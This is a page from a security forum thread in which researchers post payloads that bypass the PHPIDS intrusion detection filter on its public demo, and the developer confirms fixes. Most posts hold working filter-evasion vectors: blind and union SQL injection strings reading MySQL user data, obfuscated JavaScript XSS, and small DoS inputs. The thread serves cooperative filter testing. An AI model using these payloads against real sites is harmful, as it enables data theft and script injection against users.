Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...2122232425262728293031Next
Current Page: 30 of 31
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: June 29, 2010 02:47PM

Will be fixed next week - sorry for the long delay... @Reiners indeed :)

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: July 12, 2010 05:27PM

extract data blind with PHPIDS impact 0:

m' sounds like (select if (mid((select `username` from users limit 1),1,1)=0x71 , 0 , \N)) and '1

link (because every space is needed):

http://demo.php-ids.org/?test=m'%20sounds%20like%20(select%20if%20%20(mid((select%20%60username%60%20from%20users%20limit%201),1,1)=0x71%20,%200%20,%20%5CN))%20and%20'1

interesting to note:
- functions can be called with lots of spaces before parenthesis: SELECT ascii (1)
- there can be a lot of bullshit in this part and the syntax is still valid:
select(name) `bullshit bullshit bullshit`from users
- this works as well:
select`name`buuullshit from users



Edited 1 time(s). Last edit at 07/12/2010 05:30PM by Reiners.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: lightos
Date: July 12, 2010 06:48PM

Reiners Wrote:
-------------------------------------------------------
> interesting to note:
> - functions can be called with lots of spaces
> before parenthesis: SELECT ascii (1)

it's a nice trick, but from what I remember it doesn't work with all functions.

> - there can be a lot of bullshit in this part and
> the syntax is still valid:
> select(name) `bullshit bullshit bullshit`from
> users
> - this works as well:
> select`name`buuullshit from users

just a MySQL Alias in both cases

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: August 07, 2010 04:40AM

1) Iterator - very dangerous function (FF)
* w = this <-- forbidden
* bypass:
xyz=Iterator([this]).next()
zyx=xyz[1].alert
zyx(1)

2) for each - very dangerous cycle (FF)

for each (x in{a:this})x=x.alert
x(1)

3) // also 09,0C,0B,0A,0D,A0

xzy={x :this}.x.alert
xzy(1)

http://demo.php-ids.org/?test=xzy={x%20:this}.x.alert%0Axzy%281%29

4) (GC)
xde=(1, /at\ob/\i),
rty=(1, /atob\t/\i),
atat=xde(rty),
alal=(1,/YWxlcnQ\t/\i), 
ghj=(1,/YWxlcn\Q/\i), 
alal=ghj(alal),
sor=atat.sort,
sor1=sor(),
atat=sor1[atat],
alal=atat(alal),
alal=sor1[alal],
alal(1)

5)
* x.constructor & concatenation <-- forbidden
* bypass:
ale= (1, "ale" ),
rt= (1, "rt (1),0 "),
alal= ale+rt,
x2=02.constructor,
y=x2.constructor,
y(alal)()

or

t="t (1),0 ",
x2 = (1, {x2:02.constructor,a:0}.x2),
xyz = (1, {xyz:x2.constructor,a:0}.xyz),
xyz("aler" + t)()

*sorry, I'm very difficult to stay.)

6) for in - yet another way for getting a string that is filtered.

for(lo in{j:this}.j)!/ale.t/(lo)||this[{},lo](+!'')



LeverOne

----------------------
~Veritas~



Edited 3 time(s). Last edit at 08/08/2010 08:15AM by LeverOne.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: August 08, 2010 01:44PM

Haha nice - I liked the /./\i trick most - on character but amazing impact!

Thanks :)

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: August 09, 2010 05:11AM

Yeah those are sweet bypasses :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS 0.6.4
Posted by: LeverOne
Date: August 10, 2010 08:43AM

Thanks!

Quote

I liked the /./\i trick

look also:
1) xde = (1 , {a:0,b:/atob/,c:0}.b)
2) xde = (1,/atob/\ i)

In general, assignment - is a global problem.

x=0||this.alert
x(1)

t="t (1),0 "
for each (lo2 in{1:[].filter})
for (fake in!t);
dd=lo2.constructor
ff=dd("aler"+ t)()

Opera only <-- This vector closes my week of the PHPIDS.

xyz = "javas	\	cript:aler	\	t (1),0",
lo = {},
lo[xyz] = 0
for (0||location in"fake",lo)0


LeverOne

----------------------
~Veritas~



Edited 2 time(s). Last edit at 08/12/2010 01:30PM by LeverOne.

Options: ReplyQuote
Re: PHPIDS 0.6.4
Posted by: Reiners
Date: September 15, 2010 10:58AM

that' sounds like 'a bug



Edited 1 time(s). Last edit at 09/15/2010 11:22AM by Reiners.

Options: ReplyQuote
Re: PHPIDS 0.6.4
Posted by: Reiners
Date: September 15, 2010 11:18AM

jump'in (select 'Water') or '1



Edited 2 time(s). Last edit at 09/15/2010 11:20AM by Reiners.

Options: ReplyQuote
Re: PHPIDS 0.6.4
Posted by: Anonymous User
Date: September 19, 2010 01:25PM

All fixed - thanks!

Options: ReplyQuote
Re: PHPIDS 0.6.4
Posted by: Gareth Heyes
Date: February 23, 2011 12:30PM

I went all retro
You need phpids in ie7 compat for it to work on IE9 and you have to click a link

[www.businessinfo.co.uk]

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 02/23/2011 12:30PM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Reiners
Date: March 30, 2011 11:32AM

welcome back =)

fo"o'or'1

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: April 02, 2011 10:49AM

Thx :) Fixed!

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: lightos
Date: April 10, 2011 09:34AM

It had been a while since I had posted a bypass, figured it was time.
Almost hurts to see this one get fixed.

null' or @:=(select all user'' from mysql . user limit 1) union#
#
select @'

http://demo.phpids.org/?test=null' or @:=(select all user'' from mysql . user limit 1)union%23%0A%23%0Aselect @'

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: April 10, 2011 10:57AM

Wow - I hear you :) At least three bypass techniques in one vector (probably more but I managed to spot three of them :D). Thx!

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: lightos
Date: April 11, 2011 02:30AM

A bit more abuse with the #

1' and #aa
#bb
version() like trim(0x3520)'

1'and #
#aa
0 union#
#bb
select `user`u#
#cc
from mysql.user '



Edited 1 time(s). Last edit at 04/11/2011 02:34AM by lightos.

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: April 16, 2011 11:40AM

Neat :) Those bloody comments are ever returning buggers - I installed another fix - knowing that you can possibly break it within minutes.

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: lightos
Date: April 16, 2011 09:44PM

You're right.

1'and #
#aa
0 union#
#bb
select version()`

1'and #
#aa
0 union#
#bb
select (select `user` from#
#cc
mysql.user limit 1)'

Will leave it at that for now.

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: May 22, 2011 04:54PM

Finally managed to deploy the fix ;) Thx!

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: hafif
Date: June 11, 2011 03:09PM

Hi,
Very nice configuration, but easy to pass on IE:

http://demo.phpids.org/?test=ale\0rt(kkk.v);\/\/<b name=kkk v=Hafif >

In addition, simple DoS are available in all browsers (though low impact)

http://demo.phpids.org/?test=location%2b%2b
http://demo.phpids.org/?test=%2b%2blocation
http://demo.phpids.org/?test=location%2b=1
.
.
.
And so on...

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: lightos
Date: June 14, 2011 02:26PM

Hehe that was pretty easy, nice stuff!

Edit: http://demo.phpids.org/?test='uni\0on select 1-\0-\0+

Yikes!



Edited 1 time(s). Last edit at 06/14/2011 02:50PM by lightos.

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: June 14, 2011 03:42PM

I spotted the bug and managed to fix it - just committed and deployed the fresh sources. That happens when you are spoiled by Suhosin ;)

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Gareth Heyes
Date: June 14, 2011 04:59PM

The php dev team in their infinite wisdom don't consider the conversion of \0 to NUL a bug. Crazy bastards.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: hafif
Date: June 17, 2011 12:07PM

WOW, your filters are hard to beat !!
BTW, very very nice book... couldn't stop reading !!!!

Your book said that IE will fail to handle NULL bytes, which leads me to the bypass with PHP. the rules are good enough to stop the attack on modsecurity.

What do you think about the DoS scenarios. They can be naughty if persistent injections are available.



Edited 2 time(s). Last edit at 06/17/2011 12:13PM by hafif.

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: hafif
Date: June 17, 2011 01:22PM

Hi Again,

All browsers:
http://demo.phpids.org/?test=ale\rt%281%29

A more noticeable attack:
http://demo.phpids.org/?test=\%3C\/textarea%3E\%3C\script%3Ealer\t%281%29%3C\/\script%3E


I think, this is due to the removal of the '\' char...

The same technique can be use for other attacks.



Edited 5 time(s). Last edit at 06/17/2011 01:46PM by hafif.

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Gareth Heyes
Date: June 17, 2011 02:52PM

tut tut mario with stripslashes :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: hafif
Date: June 17, 2011 03:57PM

Hey, I have a question,
Am I suppose to be able to inject a simple <a href> tag ?
This could be used for phising attacks.

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: June 22, 2011 04:58PM

@hafif Excuse the late reply - didn't find time to look into the issues up to now. First of all: awesome finds! Some were caused by changes in PHP 5.3.x, some were plain bugs, one was a bug in the demo resulting from the server move - overall I had three locations to fix :)

It should be quite okay now - although I have a certain feeling that you might find more. About the DoS - I am not sure yet what to do about that. Will address it in a later release. Same for the links. Usually devs might wanna allow arbitrary HTTP(s) URLs - sometimes not. We should - as far as I can think now - include an option in the Config.ini.php to delegate the setting to the HTMLPurifier API we use under the hood.

Thanks again, great finds!
.mario

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: hafif
Date: June 23, 2011 09:25PM

.mario Wrote:
-------------------------------------------------------
> First of all:
> awesome finds! Some were caused by changes in PHP
> 5.3.x, some were plain bugs, one was a bug in the
> demo resulting from the server move - overall I
> had three locations to fix :)

THANKS :)

The following bypass was not so hard. And is using the shift operator <<.
The real challenge, which was extremely difficult was the fact that there are multiple onclick injection points which caused errors before the script tag is launched (It should be noted that this difficulty might be limited to the scope of the demo application).

But I managed to get everyone satisfied:
http://demo.phpids.org/?test=%0d%2ba%0d>>setTimeout(a(1).a%2ba(1).b%2ba(1).c,1000);%0d'1';"1"="1";a="1\"\n<a name=a a=con b=fi c=rm(120) >1<<1\'1'1\"1";

Works on IE.



Edited 2 time(s). Last edit at 06/24/2011 12:24PM by hafif.

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: June 25, 2011 01:10PM

Ha - you seem to know the regexes better than me meanwhile ;)

Again, priceless find! Fixed and thanks a lot.

Options: ReplyQuote
Pages: PreviousFirst...2122232425262728293031Next
Current Page: 30 of 31


Sorry, only registered users may post in this forum.